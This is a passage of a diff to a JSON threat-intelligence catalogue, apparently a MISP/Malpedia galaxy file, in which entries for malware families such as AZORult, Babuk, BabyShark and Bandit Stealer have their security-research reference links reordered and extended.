"https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/", + "https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05", + "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/", + "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", + "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", + "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", + "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/", + "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat", + "https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/", + "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://community.riskiq.com/article/56e28880", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", + "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", + "https://community.riskiq.com/article/2a36a7d2/description", + "https://securelist.com/azorult-analysis-history/89922/", "https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/", - "https://twitter.com/DrStache_/status/1227662001247268864", - "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east", - "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", + "https://unit42.paloaltonetworks.com/cybersquatting/", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/" + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", + "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", + "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", + "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html", + "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", + "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html", + "https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east", + "https://fr3d.hk/blog/gazorp-thieving-from-thieves" ], "synonyms": [ "PuffStealer", @@ -14112,8 +14765,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azov_wiper", - "https://research.checkpoint.com/2022/pulling-the-curtains-on-azov-ransomware-not-a-skidsware-but-polymorphic-wiper/", "https://twitter.com/_CPResearch_/status/1587837524604465153", + "https://research.checkpoint.com/2022/pulling-the-curtains-on-azov-ransomware-not-a-skidsware-but-polymorphic-wiper/", "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper" ], "synonyms": [], @@ -14123,7 +14776,7 @@ "value": "Azov Wiper" }, { - "description": "", + "description": "According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers\u2019 analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda", @@ -14140,11 +14793,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", - "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", - "https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/", "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", "http://www.spiegel.de/media/media-35683.pdf", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/" + "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", + "https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/" ], "synonyms": [ "SNOWBALL" @@ -14159,55 +14812,58 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", - "https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/", - "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", - "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html", - "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/", - "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", - "https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/", - "https://www.bleepingcomputer.com/news/security/babuk-ransomware-is-back-uses-new-version-on-corporate-networks/", - "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/", - "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html", - "https://twitter.com/Sebdraven/status/1346377590525845504", - "https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/", - "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/", - "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.bleepingcomputer.com/news/security/leaked-babuk-locker-ransomware-builder-used-in-new-attacks/", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/IOCs-blog-Ransomware%20Actor%20Abuses%20Genshin%20Impact%20Anti-Cheat%20Driver%20to%20Kill%20Antivirus.txt", - "https://twitter.com/GossiTheDog/status/1409117153182224386", - "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/", - "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62", - "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", - "https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/", - "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", - "https://blog.morphisec.com/babuk-ransomware-variant-major-attack", - "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf", - "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f", - "https://securelist.com/ransomware-world-in-2021/102169/", - "https://krebsonsecurity.com/2022/02/wazawaka-goes-waka-waka/", - "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", - "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/", - "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/is-there-really-such-a-thing-as-a-low-paid-ransomware-operator/", - "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b", - "https://raw.githubusercontent.com/vc0RExor/Malware-Threat-Reports/main/Ransomware/Babuk/Babuk_Ransomware_EN_2021_05.pdf", - "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/", - "https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings", "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-moving-to-vm-nix-systems.pdf", - "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf", - "https://www.fr.sogeti.com/globalassets/france/avis-dexperts--livres-blancs/cybersecchronicles_-_babuk.pdf", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/is-there-really-such-a-thing-as-a-low-paid-ransomware-operator/", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", + "https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/", + "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html", + "https://blog.morphisec.com/babuk-ransomware-variant-major-attack", + "https://github.com/EmissarySpider/ransomware-descendants", + "https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/", + "https://raw.githubusercontent.com/vc0RExor/Malware-Threat-Reports/main/Ransomware/Babuk/Babuk_Ransomware_EN_2021_05.pdf", + "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b", + "https://mssplab.github.io/threat-hunting/2023/06/15/malware-analysis-babuk.html", + "https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/", + "https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/", + "https://www.bleepingcomputer.com/news/security/babuk-ransomware-is-back-uses-new-version-on-corporate-networks/", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", + "https://twitter.com/Sebdraven/status/1346377590525845504", + "https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/", + "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", + "https://securelist.com/ransomware-world-in-2021/102169/", + "https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/", + "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html", + "https://twitter.com/GossiTheDog/status/1409117153182224386", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/IOCs-blog-Ransomware%20Actor%20Abuses%20Genshin%20Impact%20Anti-Cheat%20Driver%20to%20Kill%20Antivirus.txt", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf", + "https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/", + "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/", + "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", + "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", + "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://krebsonsecurity.com/2022/02/wazawaka-goes-waka-waka/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/", - "https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/" + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/", + "https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/", + "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/", + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", + "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f", + "https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings", + "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/", + "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62", + "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", + "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.bleepingcomputer.com/news/security/leaked-babuk-locker-ransomware-builder-used-in-new-attacks/", + "https://www.fr.sogeti.com/globalassets/france/avis-dexperts--livres-blancs/cybersecchronicles_-_babuk.pdf", + "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf" ], "synonyms": [ "Babyk", @@ -14236,11 +14892,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", - "https://www.mandiant.com/resources/evolution-of-fin7", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", - "https://www.infosecurityeurope.com/__novadocuments/367989?v=636338290033030000" + "https://www.infosecurityeurope.com/__novadocuments/367989?v=636338290033030000", + "https://www.mandiant.com/resources/evolution-of-fin7" ], "synonyms": [], "type": [] @@ -14253,24 +14909,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark", + "https://www.youtube.com/watch?v=Dv2_DK3tRgI", + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", + "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", + "https://blog.alyac.co.kr/3352", + "https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood", + "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", "https://twitter.com/i/web/status/1099147896950185985", + "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", "https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1", "https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/", "https://www.youtube.com/watch?v=rfzmHjZX70s", - "https://blog.alyac.co.kr/3352", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", - "https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood", - "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", - "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", - "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", - "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html", - "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf", - "https://blog.google/threat-analysis-group/how-were-protecting-users-from-government-backed-attacks-from-north-korea/", - "https://www.youtube.com/watch?v=Dv2_DK3tRgI" + "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", + "https://blog.google/threat-analysis-group/how-were-protecting-users-from-government-backed-attacks-from-north-korea/" ], "synonyms": [ "LATEOP" @@ -14351,10 +15007,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", - "https://www.secureworks.com/research/threat-profiles/bronze-geneva", - "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/" + "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-geneva" ], "synonyms": [ "Lecna", @@ -14370,15 +15026,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap", - "https://research.checkpoint.com/the-evolution-of-backswap/", - "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/", - "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", - "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/", - "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi", - "https://explore.group-ib.com/htct/hi-tech_crime_2018", "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", + "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", + "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/", + "https://explore.group-ib.com/htct/hi-tech_crime_2018", + "https://research.checkpoint.com/the-evolution-of-backswap/", "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://www.cert.pl/en/news/single/backswap-malware-analysis/", + "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/", "https://www.cyberbit.com/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/" ], "synonyms": [], @@ -14392,10 +15048,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", + "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack", "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html", "https://www.us-cert.gov/ncas/analysis-reports/ar19-252a", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack" + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf" ], "synonyms": [], "type": [] @@ -14435,9 +15092,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", "https://team-cymru.com/blog/2021/03/15/fin8-badhatch-threat-indicator-enrichment/", "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf" + "https://blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/" ], "synonyms": [], "type": [] @@ -14450,20 +15108,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", - "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html", - "https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", - "https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait", - "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf", - "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", - "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", - "https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/", "https://lab52.io/blog/new-patchwork-campaign-against-pakistan/", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", + "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html", + "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", + "https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://securelist.com/apt-trends-report-q1-2021/101967/", - "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign" + "https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign", + "https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait", + "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2", + "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf" ], "synonyms": [], "type": [] @@ -14504,10 +15162,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.baldr", - "https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf", "https://www.youtube.com/watch?v=E2V4kB_gtcQ", - "https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/" + "https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/", + "https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/" ], "synonyms": [ "Baldir" @@ -14548,8 +15206,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital", - "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/trojan-bamital-13-en.pdf", - "https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/" + "https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/", + "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/trojan-bamital-13-en.pdf" ], "synonyms": [], "type": [] @@ -14584,20 +15242,37 @@ "uuid": "a2ee2f24-ead8-4415-b777-7190478a620c", "value": "bancos" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandit", + "https://www.cloudsek.com/blog/breaking-into-the-bandit-stealer-malware-infrastructure", + "https://www.zscaler.com/blogs/security-research/technical-analysis-bandit-stealer", + "https://www.trendmicro.com/en_in/research/23/e/new-info-stealer-bandit-stealer-targets-browsers-wallets.html", + "https://research.openanalysis.net/bandit/stealer/garble/go/obfuscation/2023/07/31/bandit-garble.html", + "https://research.openanalysis.net/garble/go/obfuscation/strings/2023/08/03/garble.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "53ef2273-0e62-4ad3-bcbc-d2cd72fc6108", + "value": "Bandit Stealer" + }, { "description": "Bandook malware is a remote access trojan (RAT) first seen in 2007 and has been active for several years. Written in both Delphi and C++, it was first seen as a commercial RAT developed by a Lebanese creator named PrinceAli. Over the years, several variants of Bandook were leaked online, and the malware became available for public download.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook", - "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook", - "https://www.welivesecurity.com/2021/07/07/bandidos-at-large-spying-campaign-latin-america/", - "https://research.checkpoint.com/2020/bandook-signed-delivered/", - "https://research.checkpoint.com/2020/bandook-signed-delivered", - "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot", - "https://www.eff.org/deeplinks/2023/02/uncle-sow-dark-caracal-latin-america", "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", 